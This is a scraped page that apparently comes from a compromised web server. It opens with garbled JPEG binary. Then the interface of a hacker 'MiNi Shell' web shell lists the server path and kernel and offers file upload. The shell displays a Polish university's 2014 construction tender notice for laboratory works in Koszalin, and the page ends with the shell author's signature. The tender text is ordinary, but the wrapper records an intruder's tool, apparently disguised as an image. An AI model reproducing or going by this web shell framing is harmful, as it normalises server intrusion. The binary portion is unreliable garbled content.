JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140319/58519-N-2014.html

<p class="kh_header"><b>Koszalin: Wydzielenie pomieszczeń w Laboratorium 7 I w budynku I przy ul. Śniadeckich 2 w Koszalinie wraz z wykonaniem robót elektrycznych i sanitarnych</b><br>
<b>Numer ogłoszenia: 58519 - 2014; data zamieszczenia: 19.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Koszalińska , ul. Śniadeckich 2, 75-453 Koszalin, woj. zachodniopomorskie, tel. (094) 34-78-637, 34-78-635, faks (094) 34-78-636.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tu.koszalin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wydzielenie pomieszczeń w Laboratorium 7 I w budynku I przy ul. Śniadeckich 2 w Koszalinie wraz z wykonaniem robót elektrycznych i sanitarnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest Wydzielenie pomieszczeń w Laboratorium 7 I w budynku I przy ul. Śniadeckich 2 w Koszalinie wraz z wykonaniem robót elektrycznych i sanitarnych w zakresie określonym w Specyfikacji Istotnych Warunków Zamówienia,  przedmiarach robót - Załącznik nr 2, dokumentacji projektowej - Załącznik - nr 3, oraz specyfikacjach technicznych wykonania i odbioru robót budowlanych - Załącznik nr 4.

Przedmiot zamówienia opisują następujące kody Wspólnego Słownika Zamówień (CPV): 45.45.00.00-6; 45.33.12.10-1; 45.31.10.00-0

2. Zakres prac obejmuje:
-wykonanie ścianek dwuwarstwowych na rusztach pojedynczych z profili 100x0,6mm z pokryciem obustronnym płytami gipsowo-kartonowymi wodo i ogniochronnymi (co drugi kształtownik główny U-100x0,60 zamienić na profil ościeżnicowy UA 100) z wypełnieniem wełną mineralną gr 80mm,
-wykonanie stropu z krawędziaków o wymiarach przekroju 7x14cm z tarcicy nasyconej mocowanych do murłat i opartych na ścianach za pomocą systemowych złączy ciesielskich z wykonaniem okładziny stropu od spodu płytami gipsowo-kartonowymi wodo i ogniochronnymi na ruszcie metalowym podwójnym podwieszanym z kształtowników CD i UD z wykonaniem izolacji przeciwwilgociowej z folii polietylenowej grubości 0,3mm i izolacji z wełny mineralnej grubości 80mm i przekrycie stropu płytami g-k od góry
-montaż stolarki okiennej i drzwiowej (miejsce montażu stolarki okiennej zostanie wskazane w trakcie realizacji robót)
-wykonanie cokolików z płytek gres i malowanie całości wykonanych pomieszczeń dwukrotnie farbą emulsyjną z gruntowaniem
-wykonanie instalacji wentylacji mechanicznej i instalacji wod-kan. wraz z zakupem urządzeń zgodnie z załączonym projektem budowlanym.
-wykonanie instalacji elektrycznych według wskazań zamawiającego w ilościach określonych w przedmiarze robót
3.Materiały użyte do wykonania przedmiotu umowy powinny odpowiadać co do jakości wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie (art.10 ustawy - Prawo budowlane, ustawa o wyrobach budowlanych z dnia 16.04.2004r. - Dz.U. Nr 92, poz. 881 z późn. zmianami) oraz wymogom specyfikacji istotnych warunków zamówienia.
Na każde żądanie Zamawiającego Wykonawca zobowiązany jest okazać w stosunku do wskazanych materiałów : certyfikat na znak bezpieczeństwa, deklarację właściwości użytkowych, niezbędne atesty, aprobaty techniczne. 
Zamawiający dopuszcza zastosowanie urządzeń i wyrobów (materiałów) równoważnych, tj. o  parametrach równych lub wyższych (tzn. nie gorszych) od wymaganych w  specyfikacjach technicznych wykonania i odbioru robót budowlanych, dokumentacji projektowej branży sanitarnej oraz przedmiarach robót, zgodnie z art. 29 ust.3 ustawy Pzp.
Ponadto, w związku z art.30 ust.4 i 5 ustawy Pzp Zamawiający dopuszcza zastosowanie rozwiązań równoważnych w stosunku do opisywanych w specyfikacjach technicznych wykonania i odbioru robót budowlanych, dokumentacji projektowej branży sanitarnej oraz przedmiarach robót stanowiących przedmiot zamówienia.

4.Zamawiający wymaga udzielenia 36-miesięcznej gwarancji na wykonane roboty (licząc od daty podpisania końcowego protokołu odbioru robót).

5.Zamawiający dopuszcza możliwość przeprowadzenia wizji lokalnej miejsca wykonywania zamówienia wyborowi wykonawcy jako czynności pomocniczej w celu prawidłowego przygotowania oferty, po uprzednim uzgodnieniu terminu i godziny .

6. Zamawiający przed podpisaniem umowy zażąda:
a) w przypadku udzielenia zamówienia konsorcjum lub innym wykonawcom składającym ofertę wspólną (tzn. wykonawcy określonemu w art. 23 ust. 1 ustawy Pzp), Zamawiający przed podpisaniem umowy zażąda złożenia umowy regulującej współpracę tych Wykonawców.
b) wniesienia przez wykonawcę zabezpieczenia należytego wykonania umowy w wysokości 8% ceny umownej brutto 
c) przedstawienia opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej na kwotę min. 50 000,00 zł w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
d) przedłożenia  kosztorysu ofertowego szczegółowego sporządzony metodą kalkulacji szczegółowej. 

Kalkulacja szczegółowa polega na obliczeniu ceny kosztorysowej jako sumy iloczynu liczby jednostek przedmiarowych robót, jednostkowych nakładów rzeczowych i ich cen oraz doliczonych kosztów pośrednich, kosztów zakupu materiałów i zysku. Podatek od towarów i usług należy doliczyć na końcu kosztorysu ofertowego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.00.00-6, 45.33.12.10-1, 45.31.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w zakresie posiadania uprawnień do
wykonywania określonej działalności. Warunek ten Zamawiający uzna za spełniony jeżeli Wykonawca
złoży wraz z ofertą podpisane oświadczenie, o którym mowa w rozdziale V pkt.1a) SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący wiedzy i doświadczenia,jeżeli wykaże
się doświadczeniem w realizacji robót o charakterze i złożoności porównywalnej z zakresem
przedmiotu zamówienia tj. min. 1 robota budowlana polegająca na wykonaniu robót branży
budowlanej i branży sanitarnej, w tym instalacji wentylacji mechanicznej o wartości co najmniej 50
000,00 zł brutto, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert
albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności
jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z
załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały
wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki
budowlanej i prawidłowo ukończone.Zamawiający dokona oceny spełniania tego warunku w oparciu o
złożone oświadczenie Wykonawcy, o którym mowa w rozdziale V pkt. 1a) SIWZ oraz złożony wykaz
robót (Załącznik nr 5 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w zakresie dysponowania przez Wykonawcę
odpowiednim potencjałem technicznym. Warunek ten Zamawiający uzna za spełniony jeżeli
Wykonawca złoży wraz z ofertą podpisane oświadczenie, o którym mowa w rozdziale V pkt.1a) SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia za
spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami w wykonywaniu
zamówienia, w szczególności odpowiedzialnych za kierowania robotami budowlanymi, wraz z
informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia oraz
informacją o podstawie do dysponowania tymi osobami, które będą pełnić funkcję kierowników robót,
posiadającymi uprawnienia do kierowania robotami budowlanymi (dopuszcza się uprawnienia z ograniczeniami) w specjalnościach: - konstrukcyjno-budowlanej (min. 1 osoba), - instalacyjnej w
zakresie instalacji: cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych (min.1 osoba); -
instalacyjnej w zakresie instalacji elektrycznych (min.1 osoba), oraz posiadającymi wpis na listę
członków właściwej izby samorządu zawodowego. Kierownicy robót budowlanych powinni posiadać
uprawnienia budowlane zgodnie z ustawą z dnia 07 lipca 1994 r. Prawo budowlane (tekst jedn.
Dz.U.Nr 243 poz.1623 z 2010r. ze zm.) oraz rozporządzeniem Ministra Transportu i Budownictwa z
dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (tekst jedn.
Dz.U. Nr 83 poz. 578 z 2006r ze zm.) lub odpowiadające im ważne uprawnienia budowlane, które
zostały wydane na podstawie wcześniej obowiązujących przepisów. Zgodnie z art. 12a ustawy Prawo
budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy mogą
również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach
określonych w przepisach odrębnych. Zamawiający dopuszcza połączenie wyżej wskazanych funkcji
pod warunkiem spełnienia przez osobę łączącą te funkcje wszystkich warunków wymaganych dla
poszczególnych funkcji. Zamawiający dokona oceny spełniania tego warunku w oparciu o złożone
oświadczenie Wykonawcy, o którym mowa w rozdziale V pkt. 1a) SIWZ, złożony wykaz osób
spełniających ww. wymagania (Załącznik nr 6 do SIWZ) oraz oświadczenie, że osoby, które będą
uczestniczyć w wykonywaniu zamówienia wskazane w Załączniku nr 6 do SIWZ, posiadają wymagane
uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (wzór oświadczenia
stanowi Załącznik nr 6A do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w zakresie sytuacji ekonomicznej i finansowej.
Warunek ten Zamawiający uzna za spełniony jeżeli Wykonawca złoży wraz z ofertą podpisane
oświadczenie, o którym mowa w rozdziale V pkt.1a) SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce
zamieszkania, nie wydaje się dokumentów, o których mowa w pkt.III.4.3.1), zastępuje się je dokumentem
zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone
przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub
gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub
miejsce zamieszkania, lub przed notariuszem - wystawione z odpowiednią datą wymaganą dla tych
dokumentów. W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę
lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do
właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma
siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących
przedłożonego dokumentu.2.Pozostałe dokumenty wymienione w rozdziale XI.5 SIWZ: -Formularz ofertowy
zawierajacy oświadczenie wykonawcy o spełnianiu warunków udziału w postepowaniu - wypełniony i podpisany
druk stanowiacy Załącznik Nr 1 do SIWZ, Zobowiązanie innych podmiotów do uczestniczenia w realizacji
zamówienia (gdy dotyczy) - Załącznik nr 7 do SIWZ -Pełnomocnictwo do reprezentowania Wykonawcy, o ile
ofertę składa pełnomocnik -Ocena spełniania warunków udziału w postępowaniu dokonana będzie w oparciu o
złożone przez Wykonawcę w niniejszym postępowaniu dokumenty i oświadczenia, o których mowa w rozdziale
XI.5 SIWZ wg formuły spełnia - nie spełnia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Umowa nie może być sprzeczna z warunkami przedstawionymi w niniejszej specyfikacji. 2.Pozostałe warunki
umowne określa wzór umowy stanowiący Załącznik nr 10 do SIWZ. 3. Wykonawcy występujący wspólnie
ponoszą solidarną odpowiedzialność za wykonanie zamówienia. 4.Zamawiający zgodnie z art.144 ust.1 ustawy
prawo zamówień publicznych przewiduje możliwość dokonania zmian istotnych postanowień zawartej umowie w
stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w sytuacji, gdy konieczność
wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,
w zakresie: a) wydłużenia terminu obowiązywania umowy, pod warunkiem, że: - zachodzi konieczność
wykonania robót dodatkowych, o których mowa art.67 ust.1 pkt.5 Prawa zamówień publicznych, których
wykonanie w sposób obiektywny uniemożliwia terminowe zakończenie realizacji przedmiotu zamówienia, - w
przypadku wstrzymania robót przez Zamawiającego lub przerw w wykonywaniu robót powstałych na skutek
okoliczności, za które ponosi odpowiedzialność Zamawiający. Podstawą dokonania zmian, o których mowa
będzie protokół konieczności określający wystąpienie okoliczności uzasadniających wprowadzenie zmiany
terminu umownego. b) w zakresie zmiany wynagrodzenia określonego w umowie w przypadku urzędowej
zmiany stawki podatku VAT - wysokość wynagrodzenia należnego Wykonawcy ustalona zostanie z
uwzględnieniem aktualnej stawki podatku VAT obowiązującej na dzień powstania obowiązku podatkowego 5.
Wszystkie powyższe postanowienia stanowiące podstawę zmian umowy, stanowią uprawnienie Zamawiającego
nie zaś jego obowiązek wprowadzenia takich zmian. 6.Nie stanowią natomiast zmiany istotnej umowy w
rozumieniu art. 144 ustawy PZP zmiany związane z obsługą administracyjno-organizacyjną umowy ( np. zmiana
rachunku bankowego lub zmiana danych teleadresowych). 7.W razie zaistnienia istotnej zmiany okoliczności
powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili
zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych
okolicznościach. W tym przypadku Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu
wykonania części umowy. 8. Wszelkie zmiany i uzupełnienia treści umowy wymagają dla swej ważności formy
pisemnej w postaci aneksu podpisanego przez obie strony</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tu.koszalin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Politechnika Koszalińska,
Sekcja Zamówień Publicznych, pok.419A, ul. Śniadeckich 2, 75-453 Koszalin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.04.2014 godzina 11:45, miejsce: Politechnika Koszalińska, Kancelaria Uczelni, ul. Śniadeckich 2, 75-453 Koszalin,
Godziny pracy: od poniedziałku do piatku od 7:30 do 15:30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com